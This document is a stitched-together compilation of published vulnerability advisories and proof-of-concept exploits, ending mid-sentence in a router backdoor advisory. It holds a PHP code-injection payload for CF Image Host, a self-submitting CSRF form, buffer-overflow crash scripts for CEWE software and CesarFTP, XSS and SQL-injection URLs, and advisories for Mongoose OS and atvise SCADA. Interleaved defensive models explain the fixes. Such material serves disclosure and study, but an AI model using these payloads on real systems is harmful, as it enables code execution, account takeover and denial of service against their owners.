[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-PHP-CMD-INJECTION.txt
Vendor:
====================================
codefuture.co.uk/projects/imagehost
Product:
===================================
CF Image Host 1.65 - 1.6.6
Archive download listed as: version 1.65
unzips as imagehost 1.6.6
Vulnerability Type:
=====================
PHP Command Injection
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
CF Image Host lets users who have access to the management area write
directly to the 'set.php' file under the /inc directory, which stores
setting values such as 'Site Title' and 'Site Slogan'. Because those values
are written into PHP source unescaped, an attacker with management access
can inject specially crafted PHP payloads and execute arbitrary operating
system commands on the victim host, possibly leading to privilege
escalation, RFI, backdoors etc. and most likely to full compromise of the
affected system or shared environment, if applicable.
PHP Command Injection Exploit code(s):
=====================================
Under the settings tab we can inject the PHP code below; it remains
persistent because it is written to disk in 'set.php'. Afterwards, when the
victim visits the application and clicks a tab, the stored OS command is
executed.
1) navigate to the CF Image Host settings tab
http://localhost/imagehost1.6.6/admin.php?act=set
2) click on the admin menu on the left and enter your passwords. DO NOT click
'Save Changes' yet, or you get an error message asking you to enter credentials
3) now go back to the settings tab, click 'General' and inject the PHP
code below into the 'Site Title' input field
4) now click 'Save Changes'; the code gets stored under the /inc
directory within the 'set.php' PHP file.
Our PHP injection payload needs the single quotes, doubled backslashes and
semicolons shown below to get the syntax right: the leading ' and ; close the
string literal and the assignment that the application writes around the
value, and the trailing quotes balance the ' and ; the application appends,
so the page still parses and does not throw a syntax error. The backslashes
have to be doubled because one level of slashes is stripped when the value is
written, as the resulting line shows.
some examples...
';echo exec("c:\\Windows\\system32\\calc.exe");'';';
'set.php' on line 11 then becomes:
$settings['SET_TITLE'] = '';echo exec("c:\Windows\system32\calc.exe");'';';';
OR inject a command to launch chrome.exe etc...
';echo exec("c:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe");'';';
Afterwards, click one of the tabs above such as 'Database' or 'Ban User' and
the stored PHP command is executed, running calc.exe or launching Google
Chrome.
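To make the quoting above concrete, here is an added Python model (not code from the advisory, and not CF Image Host's own settings writer, which the advisory does not show). The unsafe writer is an assumption that reproduces the observed set.php line: it strips one level of slashes, then drops the raw value into a single-quoted PHP literal. Beside it is a writer that escapes backslashes and single quotes the way PHP's var_export() would. The statement counter is a rough tokenizer, enough to show that the unsafe line holds four PHP statements while the hardened one holds exactly one. All function names are hypothetical.

```python
import re

# The advisory's calc.exe payload, exactly as typed into 'Site Title'.
PAYLOAD = r"""';echo exec("c:\\Windows\\system32\\calc.exe");'';';"""


def php_stripslashes(value: str) -> str:
    """Remove one level of backslash escaping, like PHP's stripslashes()."""
    return re.sub(r"\\(.)", r"\1", value)


def unsafe_settings_line(key: str, value: str) -> str:
    """Assumed vulnerable writer: the stripped value lands inside a
    single-quoted PHP string with no escaping of quotes."""
    return "$settings['%s'] = '%s';" % (key, php_stripslashes(value))


def php_single_quote(value: str) -> str:
    """Escape for a PHP single-quoted literal: only backslash and ' are special."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def safe_settings_line(key: str, value: str) -> str:
    """Hardened writer: same stored value, but it can never close the literal."""
    return "$settings['%s'] = %s;" % (key, php_single_quote(php_stripslashes(value)))


def php_statements(line: str) -> int:
    """Count ';' outside single- and double-quoted PHP strings, honouring
    backslash escapes. One settings line should be exactly one statement."""
    count, quote, i = 0, None, 0
    while i < len(line):
        c = line[i]
        if quote:
            if c == "\\" and i + 1 < len(line):
                i += 2          # skip the escaped character
                continue
            if c == quote:
                quote = None
        elif c in ("'", '"'):
            quote = c
        elif c == ";":
            count += 1
        i += 1
    return count


if __name__ == "__main__":
    print(unsafe_settings_line("SET_TITLE", PAYLOAD))
    print(safe_settings_line("SET_TITLE", PAYLOAD))
```

Running it prints the exact line the advisory shows for set.php, followed by the escaped version where the payload survives only as string content.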
Disclosure Timeline:
=====================
Vendor Notification: NA
November 13, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local / Remote
Severity Level:
================
High
Description:
================================================================
Request Method(s): [+] POST
Vulnerable Product: [+] CF Image Host 1.65 - 1.6.6
Vulnerable Parameter(s): [+] 'Site Title', 'Site Slogan' etc..
Affected Area(s): [+] OS
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
<!--
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-CSRF.txt
Vendor:
====================================
codefuture.co.uk/projects/imagehost
Product:
===================================
CF Image Host 1.65 - 1.6.6
Archive download listed as: version 1.65
unzips as imagehost 1.6.6
Vulnerability Type:
=================================
Cross site request forgery - CSRF
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
No CSRF protection exists, allowing attackers to make requests to the server
on behalf of a logged-in victim who visits a malicious site or clicks a
crafted link. This lets attackers modify web application settings to
whatever they wish.
CSRF Exploit code(s):
====================
-->
<form id='HELL' method="POST" action="http://localhost/imagehost1.6.6/admin.php?act=set">
<input type="text" name="setScriptUrl" value="http://hyp3rlinx.altervista.org" />
<input type="text" name="setTitle" value="ghostofsin" />
<input type="text" name="setSlogan" value="666" />
<input type="text" name="setCopyright" value="hyp3rlinx" />
<input type="text" name="setTheme" value="day" />
<input type="text" name="setModeRewrite" value="0" />
<input type="text" name="setAddThis" value="0" />
<input type="text" name="setLanguage" value="0" />
<input type="text" name="changesettings" value="Save+Changes" />
<input type="text" name="setModeRewrite" value="0" />
<input type="text" name="setAllowReport" value="1" />
<input type="text" name="setEmailReport" value="1" />
<input type="text" name="setHideGallery" value="1" />
<input type="text" name="setHideContact" value="1" />
<input type="text" name="setHideTos" value="1" />
<input type="text" name="setHideFaq" value="1" />
<input type="text" name="setHideSearch" value="1" />
<input type="text" name="setImageWidgit" value="1" />
<input type="text" name="setHideFeed" value="1" />
<input type="text" name="setHideSitemap" value="1" />
<input type="text" name="setAutoDeleted" value="0" />
<input type="text" name="setAutoDeletedTime" value="10" />
<input type="text" name="setAutoDeletedJump" value="m" />
<input type="text" name="setDisUpload" value="0" />
<input type="text" name="setAutoDeleted" value="0" />
<input type="text" name="setMaxSize" value="1048576" />
<input type="text" name="setMaxBandwidth" value="1024" />
<input type="text" name="setBandwidthReset" value="m" />
<input type="text" name="setMaxUpload" value="5" />
<input type="text" name="setNoDuplicate" value="0" />
<input type="text" name="setResizeImg" value="1" />
<input type="text" name="setPrivateImg" value="1" />
<input type="text" name="setWaterMark" value="0" />
<input type="text" name="setWatermarkText" value="0" />
<input type="text" name="setWatermarkImage" value="1" />
<input type="text" name="setWatermarkPlaced" value="1" />
<input type="text" name="setSUrlApi" value="b54" />
<input type="text" name="setSUrlApiUrl" value="" />
<input type="text" name="setSUrlApiUesr" value="" />
<input type="text" name="setSUrlApiPass" value="" />
<input type="text" name="setAnalytics" value="" />
<input type="text" name="setGoogleCha" value="" />
<input type="text" name="setGoogleAds" value="" />
<input type="text" name="oldPassword" value="" />
<input type="text" name="newPassword" value="" />
<input type="text" name="newConfirm" value="" />
<input type="text" name="setUserName" value="admin" />
<input type="text" name="setEmail" value="ghostofsin@abyss.com" />
<script>document.getElementById('HELL').submit()</script>
</form>
<!--
Disclosure Timeline:
=====================
Vendor Notification: NA
November 14, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
============================================================
Request Method(s): [+] POST
Vulnerable Product: [+] CF Image Host 1.65 - 1.6.6
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
-->
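The missing control is a per-session synchronizer token that the settings form echoes back and the handler verifies. The following is an added Python sketch of that check (not code from the advisory or from CF Image Host); request and session objects are plain dicts standing in for a framework, and the field name csrf_token is an assumption, since the real form has no such field.

```python
import hmac
import secrets

TOKEN_FIELD = "csrf_token"   # assumed field name; the real settings form has none


def issue_token(session: dict) -> str:
    """Create, once per session, the secret the settings form must echo back
    in a hidden field. A cross-origin attacker page cannot read it."""
    if TOKEN_FIELD not in session:
        session[TOKEN_FIELD] = secrets.token_urlsafe(32)
    return session[TOKEN_FIELD]


def csrf_ok(session: dict, form: dict) -> bool:
    """True only when the POST carries the token bound to this session.
    compare_digest keeps the comparison constant-time."""
    expected = session.get(TOKEN_FIELD)
    supplied = form.get(TOKEN_FIELD, "")
    return bool(expected) and hmac.compare_digest(expected.encode(), supplied.encode())


def save_settings(session: dict, form: dict, settings: dict) -> bool:
    """The vulnerable handler is effectively settings.update(form) for any
    POST riding on a logged-in session; the hardened one requires the token."""
    if not csrf_ok(session, form):
        return False
    settings.update({k: v for k, v in form.items() if k != TOKEN_FIELD})
    return True


def demo() -> tuple:
    session, settings = {}, {"setTitle": "CF Image Host", "setUserName": "admin"}
    issue_token(session)                       # victim has a live admin session
    # Constructed cross-site POST mirroring the auto-submitting form above:
    # the attacker knows every field name but not this session's token.
    forged = {"setTitle": "ghostofsin", "setUserName": "admin",
              "setEmail": "ghostofsin@abyss.com"}
    forged_applied = save_settings(session, forged, settings)
    # Legitimate submission from the real settings page, token included.
    legit = {"setTitle": "My host", TOKEN_FIELD: issue_token(session)}
    legit_applied = save_settings(session, legit, settings)
    return forged_applied, legit_applied, settings["setTitle"], settings.get("setEmail")
```

The forged POST is rejected and leaves the settings untouched, while the token-bearing submission from the genuine form is applied.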
# -*- coding: utf-8 -*-
# Exploit Title: CEWE PHOTO SHOW 6.4.3 - Denial of Service (PoC)
# Date: 16/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://cewe-photoworld.com/
# Software: https://cewe-photoworld.com/creator-software/windows-download
# Version: 6.4.3
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script 'photoshow.py'; it will create a new file 'photoshow.txt'
# 2.- Copy the text from the generated photoshow.txt file to the clipboard
# 3.- Open CEWE PHOTO SHOW
# 4.- Click 'Upload'
# 5.- Paste the clipboard into the 'Password' field and the application crashes
# 5000 'A' (0x41) characters are enough to crash the 'Password' field
buffer = "\x41" * 5000
with open("photoshow.txt", "w") as f:
    f.write(buffer)
#!/usr/bin/python
# Exploit Title: CEWE Photoshow 6.3.4 - Denial of Service (PoC)
# Author: Gionathan "John" Reale
# Discovery Date: 2018-08-17
# Homepage: https://cewe-photoworld.com/
# Software Link: https://cewe-photoworld.com/creator-software/windows-download
# Tested Version: 6.3.4
# Tested on OS: Windows 10
# Steps to Reproduce: Run the python exploit script; it will create a new
# file with the name "exploit.txt". Copy the text inside "exploit.txt"
# and start the program. Once inside the CEWE Photoshow program click "Login". In the new window paste the content of
# "exploit.txt" into the following fields: "email address" & "Password". Click "Ok" and you will see a crash.
buffer = "A" * 4000   # 4000 'A' characters crash both input fields
payload = buffer
try:
    with open("exploit.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(payload))
        f.write(payload)
    print("[+] File created!")
except IOError as e:
    print("File cannot be created: %s" % e)
# -*- coding: utf-8 -*-
# Exploit Title: CEWE PHOTO IMPORTER 6.4.3 - Denial of Service (PoC)
# Date: 16/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://cewe-photoworld.com/
# Software: https://cewe-photoworld.com/creator-software/windows-download
# Version: 6.4.3
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script 'photoimporter.py'; it will create a new file "sample.jpg"
# 2.- Open CEWE PHOTO IMPORTER
# 3.- Select the 'sample.jpg' file created and click 'Import all'
# 4.- Click 'Next' and 'Next', you will see a crash
# 500000 'A' (0x41) bytes with a .jpg extension: no JPEG header at all
buffer = "\x41" * 500000
with open("sample.jpg", "w") as f:
    f.write(buffer)
source: https://www.securityfocus.com/bid/47044/info
Cetera eCommerce is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Cetera eCommerce versions 15.0 and prior are vulnerable.
Cross Site Scripting:
http://www.example.com/catalog/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://www.example.com/vendors/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://www.example.com/catalog/cart/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://www.example.com/news/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://www.example.com/news/13012011111030/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://www.example.com/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
This vulnerability appeared in version 15.0. It is triggered on the 404 error
page, so it works at the URLs above and at any other URL that leads to a
non-existent page.
SQL Injection:
http://www.example.com/catalog/(version()=5.1)/
http://www.example.com/catalog/cart/.+benchmark(100000,md5(now()))+./
#!/usr/bin/env python3
#-*- coding:utf-8 -*-
# Exploit Title : CesarFTP 0.99g - (XCWD) Remote BoF Exploit
# Discovery by : Irving Aguilar
# Email : im.aguilar@protonmail.ch
# Discovery Date : 18.01.2016
# Tested Version : 0.99g
# Vulnerability Type : Denial of Service (DoS)
# Tested on OS : Windows XP Professional SP3 x86 es
import socket

# Malformed XCWD argument: 667 newlines followed by 20 NOP bytes crash the server
payload = b'XCWD ' + b'\n' * 667 + b'\x90' * 20
target = '192.168.1.73'
port = 21

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
print('[*] Target: ' + target)
print('[*] Port: ' + str(port))
s.recv(1024)                  # banner
s.send(b'USER ftp\r\n')       # log in with the ftp:ftp account used by the PoC
s.recv(1024)
s.send(b'PASS ftp\r\n')
s.recv(1024)
s.send(payload + b'\r\n')     # send the oversized XCWD command
print('[+] Buffer sent')
s.close()
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/en/research/advisories/
#
#############################################################
#
# Product: Mongoose OS
# Vendor: Cesanta
# CVE ID: CVE-2017-7185
# CSNC ID: CSNC-2017-003
# Subject: Use-after-free / Denial of Service
# Risk: Medium
# Effect: Remotely exploitable
# Authors:
# Philipp Promeuschel <philipp.promeuschel@compass-security.com>
# Carel van Rooyen <carel.vanrooyen@compass-security.com>
# Stephan Sekula <stephan.sekula@compass-security.com>
# Date: 2017-04-03
#
#############################################################
Introduction:
-------------
Cesanta's Mongoose OS [1] is an open source operating system for the Internet of Things. Supported microcontrollers:
* ESP32
* ESP8266
* STM32
* TI CC3200
Additionally, Amazon AWS IoT is integrated for Cloud connectivity. Developers can write applications in C or JavaScript (the latter by using the v7 component of Mongoose OS).
Affected versions:
---------
Vulnerable:
* <= Release 1.2
Not vulnerable:
* Patched in current dev / master branch
Not tested:
* N/A
Technical Description
---------------------
The handling of HTTP multipart boundary [3] headers does not properly close connections when malformed requests are sent to the Mongoose server.
This leads to a use-after-free / NULL pointer dereference, causing the Mongoose HTTP server to crash. As a result, the entire system is rendered unusable.
The mg_http_multipart_begin [2] function performs proper checks for empty boundaries, but, since the flag "MG_F_CLOSE_IMMEDIATELY" does not have any effect, mg_http_multipart_continue() is still called:
--------------->8---------------
void mg_http_handler(struct mg_connection *nc, int ev, void *ev_data) {
[CUT BY COMPASS]
#if MG_ENABLE_HTTP_STREAMING_MULTIPART
if (req_len > 0 && (s = mg_get_http_header(hm, "Content-Type")) != NULL &&
s->len >= 9 && strncmp(s->p, "multipart", 9) == 0) {
mg_http_multipart_begin(nc, hm, req_len); // properly checks for empty boundary
// however, the socket is not closed, and mg_http_multipart_continue() is executed
mg_http_multipart_continue(nc);
return;
}
---------------8<---------------
In the mg_http_multipart_begin function, the boundary is correctly verified:
--------------->8---------------
boundary_len =
mg_http_parse_header(ct, "boundary", boundary, sizeof(boundary));
if (boundary_len == 0) {
/*
* Content type is multipart, but there is no boundary,
* probably malformed request
*/
nc->flags = MG_F_CLOSE_IMMEDIATELY;
DBG(("invalid request"));
goto exit_mp;
}
---------------8<---------------
However, the socket is not closed (even though the flag "MG_F_CLOSE_IMMEDIATELY" has been set), and mg_http_multipart_continue is executed.
In mg_http_multipart_continue(), the method mg_http_multipart_wait_for_boundary() is executed:
---------------8<---------------
static void mg_http_multipart_continue(struct mg_connection *c) {
struct mg_http_proto_data *pd = mg_http_get_proto_data(c);
while (1) {
switch (pd->mp_stream.state) {
case MPS_BEGIN: {
pd->mp_stream.state = MPS_WAITING_FOR_BOUNDARY;
break;
}
case MPS_WAITING_FOR_BOUNDARY: {
if (mg_http_multipart_wait_for_boundary(c) == 0) {
return;
}
break;
}
--------------->8---------------
Then, mg_http_multipart_wait_for_boundary() tries to identify the boundary-string. However, this string has never been initialized, which causes c_strnstr to crash.
---------------8<---------------
static int mg_http_multipart_wait_for_boundary(struct mg_connection *c) {
const char *boundary;
struct mbuf *io = &c->recv_mbuf;
struct mg_http_proto_data *pd = mg_http_get_proto_data(c);
if ((int) io->len < pd->mp_stream.boundary_len + 2) {
return 0;
}
boundary = c_strnstr(io->buf, pd->mp_stream.boundary, io->len);
if (boundary != NULL) {
[CUT BY COMPASS]
--------------->8---------------
Steps to reproduce
-----------------
Request to HTTP server (code running on hardware device):
---------------8<---------------
POST / HTTP/1.1
Connection: keep-alive
Content-Type: multipart/form-data;
Content-Length: 1

1
--------------->8---------------
The above request results in a stack trace on the mongoose console:
---------------8<---------------
Guru Meditation Error of type LoadProhibited occurred on core 0. Exception was unhandled.
Register dump:
PC : 0x400014fd PS : 0x00060330 A0 : 0x801114b4 A1 : 0x3ffbfcf0
A2 : 0x00000000 A3 : 0xfffffffc A4 : 0x000000ff A5 : 0x0000ff00
A6 : 0x00ff0000 A7 : 0xff000000 A8 : 0x00000000 A9 : 0x00000085
A10 : 0xcccccccc A11 : 0x0ccccccc A12 : 0x00000001 A13 : 0x00000000
A14 : 0x00000037 A15 : 0x3ffbb3cc SAR : 0x0000000f EXCCAUSE: 0x0000001c
EXCVADDR: 0x00000000 LBEG : 0x400014fd LEND : 0x4000150d LCOUNT : 0xffffffff
Backtrace: 0x400014fd:0x3ffbfcf0 0x401114b4:0x3ffbfd00 0x401136cc:0x3ffbfd30 0x401149ac:0x3ffbfe30 0x40114b71:0x3ffbff00 0x40112b80:0x3ffc00a0 0x40112dc6:0x3ffc00d0 0x40113295:0x3ffc0100 0x4011361a:0x3ffc0170 0x40111716:0x3ffc01d0 0x40103b8f:0x3ffc01f0 0x40105099:0x3ffc0210
--------------->8---------------
Further debugging shows that an uninitialized string has indeed been passed to c_strnstr:
---------------8<---------------
(gdb) info symbol 0x401114b4
c_strnstr + 12 in section .flash.text
(gdb) list *0x401114b4
0x401114b4 is in c_strnstr (/mongoose-os/mongoose/mongoose.c:1720).
warning: Source file is more recent than executable.
1715 }
1716 #endif /* _WIN32 */
1717
1718 /* The simplest O(mn) algorithm. Better implementation are GPLed */
1719 const char *c_strnstr(const char *s, const char *find, size_t slen) WEAK;
1720 const char *c_strnstr(const char *s, const char *find, size_t slen) {
1721 size_t find_length = strlen(find);
1722 size_t i;
1723
1724 for (i = 0; i < slen; i++) {
(gdb) list *0x401136cc
0x401136cc is in mg_http_multipart_continue (/mongoose-os/mongoose/mongoose.c:5893).
5888 mg_http_free_proto_data_mp_stream(&pd->mp_stream);
5889 pd->mp_stream.state = MPS_FINISHED;
5890
5891 return 1;
5892 }
5893
5894 static int mg_http_multipart_wait_for_boundary(struct mg_connection *c) {
5895 const char *boundary;
5896 struct mbuf *io = &c->recv_mbuf;
5897 struct mg_http_proto_data *pd = mg_http_get_proto_data(c);
(gdb)
--------------->8---------------
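The following is an added Python model of the state machine described above (not Mongoose code; names mirror the C functions but everything here is a re-implementation). It parses the malformed request from the steps to reproduce, runs the vulnerable path, which reaches the boundary search with no boundary set, and the hardened path, which bails out the way the fix in the Workaround section does. One assumption is flagged in the code: on the empty-boundary path the request bytes are still in recv_mbuf, which is what makes the length check pass.

```python
MG_F_CLOSE_IMMEDIATELY = 1 << 0

# The request from "Steps to reproduce", as bytes on the wire (constructed).
RAW_REQUEST = (b"POST / HTTP/1.1\r\n"
               b"Connection: keep-alive\r\n"
               b"Content-Type: multipart/form-data;\r\n"
               b"Content-Length: 1\r\n"
               b"\r\n"
               b"1")


def parse_request(raw: bytes) -> tuple:
    """Split an HTTP/1.1 request into a lower-cased header dict and the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def parse_boundary(content_type: bytes) -> bytes:
    """Like mg_http_parse_header(ct, "boundary", ...): b'' when the parameter
    is missing, which is exactly the malformed case."""
    for param in content_type.split(b";")[1:]:
        name, _, value = param.strip().partition(b"=")
        if name.strip().lower() == b"boundary":
            return value.strip().strip(b'"')
    return b""


class Conn:
    """Stands in for mg_connection plus its mg_http_proto_data."""
    def __init__(self, recv_mbuf: bytes):
        self.recv_mbuf = recv_mbuf
        self.flags = 0
        self.boundary = None           # mp_stream.boundary, unset until begin()
        self.boundary_len = 0
        self.state = "MPS_BEGIN"


def multipart_begin(conn: Conn, headers: dict) -> None:
    boundary = parse_boundary(headers.get(b"content-type", b""))
    if not boundary:
        conn.flags |= MG_F_CLOSE_IMMEDIATELY   # set here, ignored by the caller
        return
    conn.boundary = b"--" + boundary
    conn.boundary_len = len(conn.boundary)


def wait_for_boundary(conn: Conn, hardened: bool) -> int:
    if len(conn.recv_mbuf) < conn.boundary_len + 2:
        return 0
    if hardened and conn.boundary is None:
        conn.state = "MPS_FINALIZE"            # the fix's early exit
        return 0
    if conn.boundary is None:
        # c_strnstr() starts with strlen(find); find == NULL faults on the MCU
        raise RuntimeError("LoadProhibited: c_strnstr(buf, NULL, len)")
    return 1 if conn.boundary in conn.recv_mbuf else 0


def multipart_continue(conn: Conn, hardened: bool) -> None:
    while True:
        if conn.state == "MPS_BEGIN":
            conn.state = "MPS_WAITING_FOR_BOUNDARY"
        elif conn.state == "MPS_WAITING_FOR_BOUNDARY":
            if wait_for_boundary(conn, hardened) == 0:
                return
            conn.state = "MPS_GOT_BOUNDARY"    # the real code goes on to part headers
        else:
            return


def handle(raw: bytes, hardened: bool) -> str:
    """Outcome for one request: the final stream state, or the crash."""
    headers, _body = parse_request(raw)
    # Assumption: on the empty-boundary path begin() bails out before the
    # request bytes are removed from recv_mbuf, so the buffer is non-empty.
    conn = Conn(raw)
    multipart_begin(conn, headers)
    try:
        multipart_continue(conn, hardened)
    except RuntimeError as e:
        return "crash: " + str(e)
    return conn.state
```

With hardened=False the malformed request reaches the NULL search and the model raises where the device faults; with hardened=True the stream is moved to MPS_FINALIZE without ever searching, and a well-formed request still finds its boundary.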
Workaround / Fix:
-----------------
Apply the following (tested and confirmed) patch:
---------------8<---------------
$ diff --git a/mongoose/mongoose.c b/mongoose/mongoose.c
index 91dc8b9..063f8c6 100644
--- a/mongoose/mongoose.c
+++ b/mongoose/mongoose.c
@@ -5889,6 +5889,12 @@ static int mg_http_multipart_wait_for_boundary(struct mg_connection *c) {
return 0;
}
+ if(pd->mp_stream.boundary == NULL){
+ pd->mp_stream.state = MPS_FINALIZE;
+ LOG(LL_INFO, ("invalid request: boundary not initialized"));
+ return 0;
+ }
+
boundary = c_strnstr(io->buf, pd->mp_stream.boundary, io->len);
if (boundary != NULL) {
const char *boundary_end = (boundary + pd->mp_stream.boundary_len);
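Review bot: the added NULL check in mg_http_multipart_wait_for_boundary() guards the symptom but leaves the root cause described above in place: mg_http_multipart_begin() sets nc->flags = MG_F_CLOSE_IMMEDIATELY on an empty boundary and mg_http_handler() still calls mg_http_multipart_continue() unconditionally, so a malformed request now parks the connection in MPS_FINALIZE instead of closing it. Consider also returning from mg_http_handler() when the flag is set after mg_http_multipart_begin(), and using `|=` rather than `=` there so other connection flags are not discarded. Two smaller points: `if(pd->mp_stream.boundary == NULL)` only works if the proto data is zero-initialised, while the advisory text calls the string "never initialized", so it is worth confirming the struct is calloc'd or memset; and LOG(LL_INFO, ...) on attacker-controlled input is cheap log spam, LL_DEBUG would be the better level.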
--------------->8---------------
The patch has been merged into Mongoose OS on github.com on 2017-04-03 [4]
Timeline:
---------
2017-04-03: Coordinated public disclosure date
2017-04-03: Release of patch
2017-03-20: Initial vendor response, code usage sign-off
2017-03-19: Initial vendor notification
2017-03-19: Assigned CVE-2017-7185
2017-03-11: Confirmation and patching Philipp Promeuschel, Carel van Rooyen
2017-03-08: Initial inspection Philipp Promeuschel, Carel van Rooyen
2017-03-08: Discovery by Philipp Promeuschel
References:
-----------
[1] https://www.cesanta.com/
[2] https://github.com/cesanta/mongoose/blob/66a96410d4336c312de32b1cf5db954aab9ee2ec/mongoose.c#L7760
[3] http://www.ietf.org/rfc/rfc2046.txt
[4] https://github.com/cesanta/mongoose-os/commit/042eb437973a202d00589b13d628181c6de5cf5b
Certec EDV atvise SCADA server 2.5.9 Privilege Escalation Vulnerability
Vendor: Certec EDV GmbH
Product web page: http://www.atvise.com
Affected version: 2.5.9
Summary: atvise scada is based on newest technologies
and standards: The visualization in pure web technology
as well as a consistent vertical object orientation based
on OPC UA changes the world of process management systems.
Desc: The application suffers from an unquoted search path
issue impacting the service 'atserver' for Windows deployed
as part of atvise SCADA. This could potentially allow an
authorized but non-privileged local user to execute arbitrary
code with elevated privileges on the system. A successful
attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or
other security applications where it could potentially be
executed during application startup or reboot. If successful,
the local user’s code would execute with the elevated privileges
of the application.
Tested on: Microsoft Windows 7 Professional SP1 (EN) 64-bit
Microsoft Windows 7 Ultimate SP1 (EN) 64-bit
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5321
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5321.php
Vendor: http://www.atvise.com/en/news-events/news/465-atvise-3-0-0-released
17.03.2016
---
C:\Users\user>sc qc atserver
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: atserver
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\atvise\atserver.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : atvise server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
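The sc qc output above has everything needed to rate the issue: an unquoted BINARY_PATH_NAME containing a space, AUTO_START and LocalSystem. The following is an added Python helper (not from the ZSL advisory, not vendor code) that parses such output and enumerates the paths CreateProcess tries before the intended binary, i.e. the locations an attacker would need to write to. The sc output embedded below is constructed from the listing above; all function names are hypothetical.

```python
import re

# Constructed from the sc qc atserver listing in the advisory.
SC_QC_OUTPUT = r"""
SERVICE_NAME: atserver
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\atvise\atserver.exe
        SERVICE_START_NAME : LocalSystem
"""


def sc_field(sc_output: str, name: str) -> str:
    """Return one field of `sc qc` output, or '' if absent."""
    m = re.search(r"^\s*%s\s*:\s*(.*)$" % re.escape(name), sc_output, re.M)
    return m.group(1).strip() if m else ""


def hijack_candidates(binary_path: str) -> list:
    """Paths Windows tries before the real binary when the path is unquoted:
    every prefix that ends at a space, with .exe appended. A quoted path
    yields nothing."""
    if binary_path.startswith('"'):
        return []
    exe = binary_path
    if ".exe" in exe.lower():               # drop any arguments after the binary
        exe = exe[: exe.lower().index(".exe") + 4]
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def assess(sc_output: str) -> dict:
    """Summarise what makes an unquoted path a privilege-escalation issue:
    the hijack candidates, plus whether the service is SYSTEM and auto-start."""
    path = sc_field(sc_output, "BINARY_PATH_NAME")
    return {
        "service": sc_field(sc_output, "SERVICE_NAME"),
        "unquoted": not path.startswith('"') and " " in path,
        "candidates": hijack_candidates(path),
        "runs_as_system": sc_field(sc_output, "SERVICE_START_NAME") == "LocalSystem",
        "auto_start": "AUTO_START" in sc_field(sc_output, "START_TYPE"),
    }


if __name__ == "__main__":
    for k, v in assess(SC_QC_OUTPUT).items():
        print("%-15s %s" % (k, v))
```

For atserver the only candidate is C:\Program.exe, so exploitation requires write access to the root of the system drive, which a default Windows 7 install does not give standard users; the helper does not check ACLs, so pair it with icacls on each candidate's parent directory.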
CERIO 11nbg 2.4Ghz High Power Wireless Router (pekcmd) Rootshell Backdoors
Vendor: CERIO Corporation
Product web page: http://www.cerio.com.tw
Affected version: DT-100G-N (fw: Cen-WR-G2H5 v1.0.6)
DT-300N (fw: Cen-CPE-N2H10A v1.0.14)
DT-300N (fw: Cen-CPE-N2H10A v1.1.6)
CW-300N (fw: Cen-CPE-N2H10A v1.0.22)
Kozumi? (fw: Cen-CPE-N5H5R v1.1.1)
Summary: CERIO's DT-300N A4 eXtreme Power 11n 2.4Ghz 2x2
High Power Wireless Access Point with built-in 10dBi
patch antennas and also supports broadband wireless
routing. DT-300N A4's wireless High Power design
enhances the range and stability of the device's
wireless signal in office and home environments.
Another key hardware function of DT-300N A4 is its PoE
Bridging feature, which allows subsequent devices to
be powered through DT-300N A4's LAN port. This
reduces device cabling and allows for more convenient
deployment. DT-300N A4 utilizes a 533Mhz high power CPU base
with 11n 2x2 transmission rates of 300Mbps. This
powerful device can produce high level performance
across multiple rooms or large spaces such as offices,
schools, businesses and residential areas. DT-300N A4
